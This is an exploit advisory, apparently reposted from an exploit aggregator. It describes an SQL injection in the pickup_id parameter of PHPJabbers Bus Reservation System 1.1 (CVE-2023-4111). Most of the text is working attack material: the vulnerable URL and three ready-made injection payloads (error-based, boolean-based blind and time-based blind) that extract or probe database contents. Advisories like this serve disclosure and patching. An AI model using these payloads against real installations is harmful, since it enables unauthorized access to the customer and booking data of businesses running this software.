Share
## https://sploitus.com/exploit?id=PACKETSTORM:173945
# Exploit Title: PHPJabbers Bus Reservation System 1.1 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 20/07/2023  
# Vendor: PHPJabbers  
# Vendor Homepage: https://www.phpjabbers.com/  
# Software Link: https://www.phpjabbers.com/bus-reservation-system/  
# Tested on: Windows 10 Pro  
# Impact: Database Access  
# CVE: CVE-2023-4111  
  
  
## Greetings  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka   
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
  
## Description  
  
SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.  
  
  
  
Path: /index.php  
  
GET parameter 'pickup_id' is vulnerable to SQL Injection  
  
https://website/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=[SQLi]&session_id=  
  
  
---  
Parameter: pickup_id (GET)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&session_id=  
  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3 AND 07569=7569&session_id=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (IF - comment)  
Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3) AND IF(now()=sysdate(),SLEEP(5),0)-- wXyW&session_id=  
---  
  
  
  
[-] Done